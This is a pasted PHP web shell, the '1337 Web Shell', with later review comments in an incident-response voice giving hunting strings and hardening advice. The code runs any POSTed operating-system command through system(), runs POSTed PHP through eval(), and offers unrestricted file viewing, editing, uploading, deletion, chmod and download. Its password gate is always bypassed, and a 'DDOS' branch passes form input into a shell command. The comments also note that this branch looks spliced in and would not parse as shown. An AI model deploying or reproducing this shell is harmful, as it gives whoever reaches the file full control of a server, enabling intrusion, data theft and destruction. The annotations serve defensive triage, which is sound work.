FeRR4L

Untitled

Jan 3rd, 2014
  1. <?php
  2.  
  3.  
  4. $xpass = '662f707d5491e9bce8238a6c0be92190'; //access-password hash; the author's note calls it sha1 with "root" as default, but 32 hex digits is MD5 length (SHA-1 is 40). NOTE(review): $xpass is never read by the code shown, so it does not gate access
  5.  
  6. /*****[COLOR CONFIG]*****/
  7. $text = '#FF0000'; //text color
  8. $background = '#1A1A1A'; //background color
  9.  
  10. /*****[PHP CONFIG]*****/
  // Removes PHP's execution time limit and keeps the script running after the
  // client disconnects; the leading @ hides any warning these calls raise.
  // Triage note: this trio at the top of an unexpected file in a web root is
  // worth a grep across the document root.
  11. @set_time_limit(0);
  12. @ini_set('max_execution_time',0);
  13. @ignore_user_abort(1);
  14.  
  15. /*****[CODE START]*****/
  16. $self = $_SERVER['PHP_SELF'];
  17. $act = $_GET['action'];
  18. $user = $_ENV['USERNAME'];
  19.  
  20. /*****[AUTH CODE]*****/
  // NOTE(review): this section does not authenticate anything in the code shown.
  //  - A posted 'xpass' value is copied unmodified into a cookie named "1337"
  //    with a 24-hour lifetime, so the typed password is sent back in clear
  //    text in the Cookie header of later requests.
  //  - The gate below tests the constant expression 1 != 1, which is always
  //    false: the login form is never printed and the else branch always runs.
  //    Neither the cookie nor $xpass is compared anywhere in the visible code.
  // Incident-response consequence: treat a host carrying this file as reachable
  // by anyone who knew or guessed its URL, not only by whoever placed it there.
  // Fixed strings usable for hunting: page title "1337 Web Shell", cookie names
  // "1337" and "1337_DIR", POST field "xpass".
  21. $pass = $_POST['xpass'];
  22. $login = "
  23.    <title>1337 Web Shell</title>
  24.    <center>Enter Password:<br>
  25.    <form method='POST' action=".$self.">
  26.   <input type='password' name='xpass'><br><input type='submit'></form>";
  27. if(isset($pass))
  28. {
  29.     setcookie("1337", $pass, time()+86400);
  30.     print ("<META http-equiv='refresh' content='0'>");
  31. }
  32. if (1 != 1)
  33. {
  34.     print ($login);
  35. }
  36. else
  37. {
  38. if (isset($_POST['1337_DIR']))
  39.    {
  40.        $x = $_POST['1337_DIR'];
  41.        setcookie("1337_DIR", $x, time()+86400);
  42.       print ("<META http-equiv='refresh' content='0'>");
  43.    }
  44. elseif ($act !== "load")
  45. {
  46.  
  47. /*****[MAIN]*****/
  48. if (ini_get("safe_mode") or strtolower(ini_get("safe_mode")) == "on"){$smode = "ON";}else{$smode = "OFF";}
  49. print ("
  50. <title>1337 Web Shell</title>
  51. <META http-equiv='expires' content='0'>
  52. <head><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head>
  53. <body text='".$text."' bgcolor='".$background."' link='".$text."' vlink='".$text."' alink='".$text."'>
  54. <center><b><font size='5'>1337 WEB SHELL</b>
  55. </font></b></div>
  56. <div align='center'>
  57. <table border='1' width='70%' bordercolorlight='".$text."' cellspacing='0' id='table1'>
  58. <tr><td colspan='2'><font style='font-size: 11.5pt'>
  59. &nbsp;System: ".php_uname()."<br>
  60. &nbsp;Server: ".$_SERVER['SERVER_SOFTWARE']."<br>
  61. &nbsp;Safe mode: ".$smode."<br>
  62. &nbsp;Host info: ".$_SERVER['HTTP_HOST'].' - '.$_SERVER['SERVER_ADDR']."
  63. </font></tr><tr><td>
  64. &nbsp;&nbsp;<a href='".$self."'>Shell</a>
  65. &nbsp;&nbsp;<a href='".$self."?action=serverinfo'>ServInfo</a>
  66. &nbsp;&nbsp;<a href='".$self."?action=files'>Files</a>
  67. &nbsp;&nbsp;<a href='".$self."?action=eval'>PHP</a>
  68. &nbsp;&nbsp;<a href='".$self."?action=xpack'>X-toolz</a>
  69. &nbsp;&nbsp;<a href='".$self."?action=ddos'>DDOS</a>
  70.  
  71. </td></tr><tr><td>");
  72.  
  73. /*****[DDOS]*****/
  // NOTE(review): as pasted, this branch looks spliced in from another file. The
  // elseif follows a print statement rather than an if block, and the lines after
  // the brace are raw HTML inside a PHP block, so the listing presumably does not
  // parse as shown. Triage on the strings and sinks, not on whether it runs.
  74. elseif($act == "ddos")
  75. {
  76.  
  77. <body bgcolor="#000000">
  78. <font face="Courier New" color="green">
  79. <center>Enter Target<br>
  80. <form method="POST">
  81. <input type="text" name="ip" value='127.0.0.1'>
  82. <input type="submit" value="fire"></center>
  83. <?php
  // Reads the 'ip' form field, builds a ping command string and hands it to
  // shell_exec(). For static scanning, a request superglobal sitting next to a
  // process-execution function is the high-signal pattern here; the companion
  // control is a disable_functions list that covers shell_exec for the web
  // server's PHP runtime.
  84. $v = $_POST['ip'];
  85. $c = 'ping -f $v';
  86. shell_exec($c);
  87. ?>
  88. /*****[SERVER INFO]*****/
  // Reconnaissance panel: prints the USERNAME environment value, whether cURL,
  // gzip and the listed database client functions exist, the magic-quotes and
  // disable_functions settings, and the loaded PHP extensions and Apache modules.
  // Nothing on the host is modified in this branch.
  // NOTE(review): the disable_functions line has an unbalanced quote as pasted
  // (looks like a character lost in the paste) — confirm against another copy
  // of the sample before relying on this listing.
  // Defensive reading: the panel shows which execution and database functions
  // are still enabled, i.e. it probes how well disable_functions is hardened.
  89. if ($act == "serverinfo")
  90. {
  91.     if(function_exists('curl_version')>0){$curl = "ON";}else{$curl = "OFF";}
  92.     (($disabled=ini_get('disable_functions'))==')?$disabled='NO':str_replace(array(',',';'), ', ', $disabled);
  93.     if(get_magic_quotes_gpc()>0){$mq="ON";}else{$mq="OFF";}
  94.     if(function_exists('apache_get_modules')>0){$apache=implode(', ',apache_get_modules());}
  95.     if(function_exists('get_loaded_extensions')>0){$phprun=implode(', ',get_loaded_extensions());}
  96.     if(function_exists('gzencode')>0){$gzip="ON";}else{$gzip="OFF";}
  97.     if(function_exists('mysql_connect')>0){$mysql="ON";}else{$mysql="OFF";}
  98.     if(function_exists('mssql_connect')>0){$mssql="ON";}else{$mssql="OFF";}
  99.     if(function_exists('pg_connect')>0){$PostgreSQL="ON";}else{$PostgreSQL="OFF";}
  100.     if(function_exists('ocilogon')>0){$Oracle="ON";}else{$Oracle="OFF";}
  101.     print("
  102.     <table><td>
  103.    <b>User:</b> " . $user ."<br>
  104.    <b>cURL:</b> " . $curl. "<br>
  105.    <b>gZip:</b> " . $gzip. "<br>
  106.    <b>MySQL:</b> " . $mysql. "<br>
  107.    <b>MsSQL:</b> " . $mssql. "<br>
  108.    <b>PostgreSQL:</b> " . $PostgreSQL. "<br>
  109.    <b>Oracle:</b> " . $Oracle. "<br>
  110.    <b>Magic Quotes:</b> ". $mq ."<br>
  111.    <b>Disabled PHP functions:</b> " . $disabled ."<br>
  112.    <b>PHP Modules:</b> " . $phprun ."<br>
  113.    <b>Apache Modules:</b> " . $apache ."<br>");
  114. }
  115.  
  116. /*****[PHP Eval]*****/
  // Passes the POSTed 'eval' field to eval() after a single quote substitution:
  // arbitrary PHP execution with the web server account's privileges. No
  // filtering step could make this branch safe; the control is that the file
  // must not be present or executable on the server.
  // Hunting: POST requests to ?action=eval carrying an 'eval' field; in static
  // scans, an eval() call whose argument traces back to $_POST.
  117. elseif($act == "eval")
  118. {
  119.     $eval=$_POST['eval'];
  120.     print("
  121.     <table><form action='".$self."?action=eval' method='POST'><tr><td>
  122.     <textarea name='eval' style='color: ".$text."; background-color: ".$background."' cols='82' rows='10'></textarea>
  123.     <input type='submit' value='eXecute' style='color: ".$text."; background-color: ".$background."'></td></tr>
  124.    <td style='border-style: solid; border-width: 1px'>");
  125.     if(isset($eval))
  126.     {
  127.         $eval=str_replace('\"', "'", $eval);
  128.         eval($eval);
  129.     }
  130. }
  131.  
  132. /*****[ENCODER]*****/
  133. elseif($act == "encoder")
  134. {
  135.     $code=$_POST['code'];
  136.     print("
  137.     <table>
  138.     <form method='POST'>
  139.     <tr><td><input size='80' style='color: ".$text."; background-color: ".$background."' name='code'>
  140.     <input type='submit' value='enc0de' style='color: ".$text."; background-color: ".$background."'>
  141.     </td></tr>");
  142.     if(isset($code))
  143.     {
  144.         print ("
  145.         <tr><td>
  146.         Text: ". $code ."<br>
  147.         Base 64 encoded: &nbsp;&nbsp;&nbsp;".base64_encode($code)."<br>
  148.         Base 64 decoded: &nbsp;&nbsp;&nbsp;".base64_decode($code)."<br>
  149.         Hex encoded text: &nbsp;&nbsp;&nbsp;".bin2hex($code)."<br>
  150.         Hex decoded text: &nbsp;&nbsp;&nbsp;".@htmlspecialchars(pack("H*",$code))."<br>
  151.         MD5 encoded text: &nbsp;".md5($code)."<br>
  152.         MD5 decoded text: &nbsp;<a href='http://gdataonline.com/qkhash.php?mode=txt&hash=".$code."'>view</a><br>
  153.         SHA1 encoded text: ".sha1($code)."<br></td>");
  154.     }
  155. }
  156.  
  157. /*****[X-PACK]*****/
  158. elseif($act == "xpack")
  159. {
  160.     print("<center>
  161.     &nbsp;&nbsp;<a href='".$self."?action=encoder'>Encoder</a><br>
  162.    ");
  163. }
  164.  
  165. /*****[FILES]*****/
  // File manager. The working directory comes from the "1337_DIR" cookie (set
  // elsewhere in this listing from a POST field of the same name) or defaults
  // to the script's own directory; no path is validated or confined.
  // The 'view' branch below reads the file named in the query string into a
  // textarea, and a posted 'content' value is written back over that same path,
  // limited only by what the web server account may read and write.
  // Response checklist: once this file is found, compare the web root and
  // configuration files against a known-good copy; edits made through this
  // branch may leave little trace beyond file mtimes and access-log entries
  // containing action=files&view=.
  166. elseif($act == "files")
  167. {
  168.     if (isset($_COOKIE['1337_DIR']))
  169.    {
  170.        $x = $_COOKIE['1337_DIR'];
  171.    }
  172.    else
  173.    {
  174.         $x = dirname($_SERVER['SCRIPT_FILENAME']);
  175.     }
  176.     $xdir=@chdir($x);
  177.     if($_GET["view"] !== NULL)
  178.     {
  179.        $view=$_GET["view"];
  180.         ob_clean();
  181.         $z = file_get_contents($view);
  182.         print("
  183.         <table>
  184.         <tr><td>
  185.         <a href='javascript:history.back();'>Go back</a>
  186.        <form method='POST'>
  187.         <textarea name='content' style='color: ".$text."; background-color: ".$background."' cols='82' rows='20'>");
  188.         print (str_replace('</textarea>', '<//textarea>', $z));
  189.         print ("</textarea><br><input type='submit' value='Save' style='color: ".$text."; background-color: ".$background."'></form>");
  190.        if(isset($_POST['content']))
  191.        {
  192.            $content = $_POST['content'];
  193.           $content = str_replace("<//textarea>", "</textarea>", $content);
  194.           $content = str_replace('\"', '"', $content);
  195.           $content = str_replace("\'", "'", $content);
  196.           $f = fopen($view, 'w');
  197.           fputs ($f, $content);
  198.           fclose ($f);
  199.           print ("<META http-equiv='refresh' content='0'>");
  200.        }
  201.     }
  202.     elseif($_GET["up"] !== NULL)
  203.     {
  204.         print("<center><b>Upload!<br></b><form enctype='multipart/form-data' action='".$self."?action=files' method='POST'>
  205.        <input type='file' style='color: ".$text."; background-color: ".$background."' size='40' name='upl' style='color: ".$text."; background-color: ".$background."'><br>
  206.        TO: <input type='text' name='dir' size='40' style='color: ".$text."; background-color: ".$background."' value=".$x.">
  207.        <input type='submit' style='color: ".$text."; background-color: ".$background."' value='GO!'></form>");
  208.     }
  209.     elseif($_GET["md"] !== NULL)
  210.     {
  211.         print("<form method='POST' action='".$self."?action=files'>
  212.        <center><b>Make dir!</b><br><input type='text' style='color: ".$text."; background-color: ".$background."' name='makedir'>
  213.        <input type='submit' value='make' style='color: ".$text."; background-color: ".$background."'></form>");
  214.     }
  215.     elseif($_GET["deletef"] !== NULL)
  216.     {
  217.         if(@unlink($_GET["deletef"]))
  218.        {
  219.            print ("<center>File \"".$_GET['deletef']."\" successful deleted!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  220.        }
  221.        else
  222.        {
  223.       print ("<center>File \"".$_GET['deletef']."\" can`t be deleted!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  224.        }
  225.     }
  226.     elseif($_GET["deleted"] !== NULL)
  227.     {
  228.         if(@rmdir($_GET["deleted"]))
  229.        {
  230.            print ("<center>Dir \"".$_GET['deleted']."\" successful deleted!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  231.        }
  232.        else
  233.        {
  234.            print ("<center>Dir \"".$_GET['deleted']."\" can`t be deleted!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  235.        }
  236.     }
  237.     elseif($_GET["rename"] !== NULL)
  238.     {
  239.        if(isset($_POST['rename']))
  240.       {
  241.           @rename($_GET['rename'], $_POST['rename']) or die ("<center>".$_GET['rename']."\" can`t be renamed to".$_POST['rename']."!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  242.          print ("<center>".$_GET['rename']."\" successful renamed to".$_POST['rename']."!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  243.       }
  244.       else
  245.       {
  246.             print ("<center>Rename ".$_GET['rename']."<br><form method='POST'>to:
  247.           <input size='45' value='".dirname($_GET['rename'])."/' name='rename' style='color: ".$text."; background-color: ".$background."'>
  248.           <input type='submit' value='Rename' style='color: ".$text."; background-color: ".$background."'>");
  249.       }
  250.    }
  251.     elseif($_GET["chmod"] !== NULL)
  252.     {
  253.        if(isset($_POST['chmod']))
  254.       {
  255.           @chmod($_GET['chmod'], $_POST['chmod']) or die ("<center>Chmod for ".$_GET['chmod']." can`t be changed to ".$_POST['chmod']."!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  256.          print ("<center>Chmod for ".$_GET['chmod']." successful changed to ".$_POST['chmod']."!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  257.       }
  258.       else
  259.       {
  260.             print ("<center>Chmod ".$_GET['cmod']."<br><form method='POST'>
  261.           <input size='45' value='0777' name='chmod' style='color: ".$text."; background-color: ".$background."'>
  262.           <input type='submit' value='Chmod' style='color: ".$text."; background-color: ".$background."'>");
  263.       }
  264.    }
  265.     elseif($_POST["makedir"] !== NULL)
  266.     {
  267.         if(@mkdir($_POST["makedir"]))
  268.        {
  269.            print ("<center>Dir \"".$_POST["makedir"]."\" successful created!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  270.        }
  271.        else
  272.        {
  273.           print ("<center>Dir \"".$_POST["makedir"]."\" can`t be created!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  274.        }
  275.     }
  276.     elseif (isset($HTTP_POST_FILES["upl"]))
  277.     {
  278.         if(@copy($HTTP_POST_FILES["upl"]["tmp_name"],
  279.        $_POST['dir']."/".$HTTP_POST_FILES["upl"]["name"]))
  280.         {
  281.             print("<center>File \"".$HTTP_POST_FILES["upl"]["name"]."\" successful uploaded<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  282.         }
  283.        else
  284.        {
  285.            print("<center>File \"".$HTTP_POST_FILES["upl"]["name"]."\" can`t be uploaded<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  286.        }
  287.     }
  288.     else
  289.     {
  // chmodr($name): prints the permission bits of $name as three rwx triplets
  // (owner / group / other) separated by "/", with "-" for an unset bit.
  // Output goes straight to the response via print; nothing is returned.
  // fileperms() is called once per bit, nine times in total.
  290.        function chmodr($name)
  291.         {
  292.             if (fileperms($name) & 00400){print "r";}else{print "-";}
  293.            if (fileperms($name) & 00200){print "w";}else{print "-";}
  294.             if (fileperms($name) & 00100){print "x";}else{print "-";}
  295.            print ("/");
  296.            if (fileperms($name) & 00040){print "r";}else{print "-";}
  297.            if (fileperms($name) & 00020){print "w";}else{print "-";}
  298.            if (fileperms($name) & 00010){print "x";}else{print "-";}
  299.            print ("/");
  300.            if (fileperms($name) & 00004){print "r";}else{print "-";}
  301.            if (fileperms($name) & 00002){print "w";}else{print "-";}
  302.            if (fileperms($name) & 00001){print "x";}else{print "-";}
  303.         }
  304.       if (PHP_OS != "WINNT"){$nowin = 1;}
  305.       if (!($dir = @opendir($x)))
  306.       {
  307.            die ("<center>Access denied on <b>".$x."<b><br><table><td><form method='POST'>
  308.             <input type='hidden' name='1337_DIR' value=".dirname($_SERVER['SCRIPT_FILENAME']).">
  309.             <input type='submit' value='Go home' style='color: ".$text."; background-color: ".$background."'>
  310.            </form>");
  311.        }
  312.        print ("<table width='695'><td colspan='6'><table><td><form method='POST'>
  313.         <input size='63' style='color: ".$text."; background-color: ".$background."' name='1337_DIR' value=".$x.">
  314.         <input type='submit' value='Go!' style='color: ".$text."; background-color: ".$background."'>
  315.        </form>
  316.       </table></center>&nbsp;<tr>
  317.       <td width='40'>Type/Name<td width='16'>Size(Byte)<td width='80'>Perms<td width='20'>Owner<td width='20'>Group<td width='20'>&nbsp;<tr>");
  318.         print ("<td width='40'>dir&nbsp;&nbsp;<b>.</b><td width='25'>---<td width='80'>");
  319.       chmodr($x."/.");
  320.       print ("<td width='20'>"); if(isset($nowin)){$k=posix_getpwuid(fileowner($x."/.")); print($k[name]);}else{print("---");} print("<td width='20'>"); if(isset($nowin)){$k=posix_getgrgid(filegroup($x."/.")); print($k[name]);}else{print("---");} print("<td width='200'>");
  321.        print ("<a href='".$self."?action=files&deleted=".$x."/.'>Delete</a>&nbsp;|&nbsp;<a href='".$self."?action=files&rename=".$x."/.'>Rename</a>&nbsp;|&nbsp;<a href='".$self."?action=files&chmod=".$x."/.'>Chmod</a><tr>");
  322.         print ("<td width='40'>dir&nbsp;&nbsp;<b>..</b><td width='25'>---<td width='80'>");
  323.       chmodr($x."/..");
  324.       print ("<td width='20'>"); if(isset($nowin)){$k=posix_getpwuid(fileowner($x."/..")); print($k[name]);}else{print("---");} print("<td width='20'>"); if(isset($nowin)){$k=posix_getgrgid(filegroup($x."/..")); print($k[name]);}else{print("---");} print("<td width='200'>");
  325.        print ("<a href='".$self."?action=files&deleted=".$x."/.'>Delete</a>&nbsp;|&nbsp;<a href='".$self."?action=files&rename=".$x."/..'>Rename</a>&nbsp;|&nbsp;<a href='".$self."?action=files&chmod=".$x."/..'>Chmod</a><tr>");
  326.         while($name = readdir($dir))
  327.         {
  328.           if (is_dir($name))
  329.           {
  330.              if ($name !== "." and $name !== "..")
  331.             {
  332.                    print ("<td width='40'>dir&nbsp;&nbsp;<b>".$name."</b><td width='25'>---<td width='80'>");
  333.                     chmodr($name);
  334.                  print ("<td width='20'>"); if(isset($nowin)){$k=posix_getpwuid(fileowner($name)); print($k[name]);}else{print("---");} print("<td width='20'>"); if(isset($nowin)){$k=posix_getgrgid(filegroup($name)); print($k[name]);}else{print("---");} print("<td width='200'>");
  335.                   print ("<a href='".$self."?action=files&deleted=".$x."/".$name."'>Delete</a>&nbsp;|&nbsp;<a href='".$self."?action=files&rename=".$x."/".$name."'>Rename</a>&nbsp;|&nbsp;<a href='".$self."?action=files&chmod=".$x."/".$name."'>Chmod</a><tr>");
  336.             }
  337.          }
  338.       }
  339.       $dir = @opendir($x);
  340.       while($name = readdir($dir))
  341.         {
  342.          if (!is_dir($name))
  343.          {
  344.                 print ("<td width='40'>".filetype($name)."&nbsp;&nbsp;".$name."<td width='25'>".filesize($name)."<td width='80'>");
  345.                 chmodr($name);
  346.              print ("<td width='20'>"); if(isset($nowin)){$k=posix_getpwuid(fileowner($name)); print($k[name]);}else{print("---");} print("<td width='20'>"); if(isset($nowin)){$k=posix_getgrgid(filegroup($name)); print($k[name]);}else{print("---");} print("<td width='200'>");
  347.               print ("<a href='".$self."?action=load&load=".$x."/".$name."'>Load</a>&nbsp;|&nbsp;<a href='".$self."?action=files&view=".$x."/".$name."'>Edit</a>&nbsp;|&nbsp;<a href='".$self."?action=files&deletef=".$x."/".$name."'>Delete</a>&nbsp;|&nbsp;<a href='".$self."?action=files&rename=".$x."/".$name."'>Rename</a>&nbsp;|&nbsp;<a href='".$self."?action=files&chmod=".$x."/".$name."'>Chmod</a><tr>");
  348.          }
  349.        }
  350.        print ("
  351.        </td><tr></td></td><tr></td><tr><td colspan='6' rowspan='2'><center><b><a href='".$self."?action=files&md'>Make Directory</a><br><a href='".$self."?action=files&up'>Uploader</a></b></td>
  352.        ");
  353.     }
  354. }
  355. /*****[SHELL]*****/
  // Default branch when no other action matches: the POSTed 'cmd' field is
  // handed to system() and its output is written into a textarea, i.e.
  // operating-system command execution as the web server account.
  // Hunting: POST bodies with a 'cmd' field sent to a script that has no reason
  // to receive one, and child processes spawned by the PHP / web server process.
  // Hardening: a disable_functions list covering system, shell_exec, passthru,
  // exec, popen and proc_open, plus a web root the server account cannot write.
  356. else
  357. {
  358.     print("
  359.     <table>
  360.     <form action='".$self."' method='POST'>
  361.     <tr><td>
  362.     <input size='80' style='color: ".$text."; background-color: ".$background."' name='cmd'><input type='submit' value='eXecute' style='color: ".$text."; background-color: ".$background."'>
  363.     </td></tr><tr><td>
  364.     <textarea style='color: ".$text."; background-color: ".$background."' cols='82' rows='20'>");
  365.     if (isset($_POST['cmd']))
  366.     {
  367.     system($_POST['cmd']);
  368.     }
  369.     print ("</textarea>");
  370. }
  371. }
  372.  
  373. /*****[FILE DOWNLOAD]*****/
  // Reached when action is "load": sends the file named by the 'load' query
  // parameter as an attachment and exits. The path is used exactly as given, so
  // any file the web server account can read can be retrieved this way.
  // Hunting: GET requests containing action=load&load=<path> in the access log
  // indicate which files were pulled from the host.
  374. else
  375. {
  376.     $load=$_GET["load"];
  377.     ob_clean();
  378.     header("Content-type: application/octet-stream/".filetype($load));
  379.     header("Content-length: ".filesize($load));
  380.     header("Content-disposition: attachment; filename=".$load);
  381.     $z = file_get_contents($load);
  382.     print $z;
  383.     exit;
  384. }
  385. }
  386.  
  387. /*****[ GOOD LUCK =) ]*****/
  388.  
  389. ?>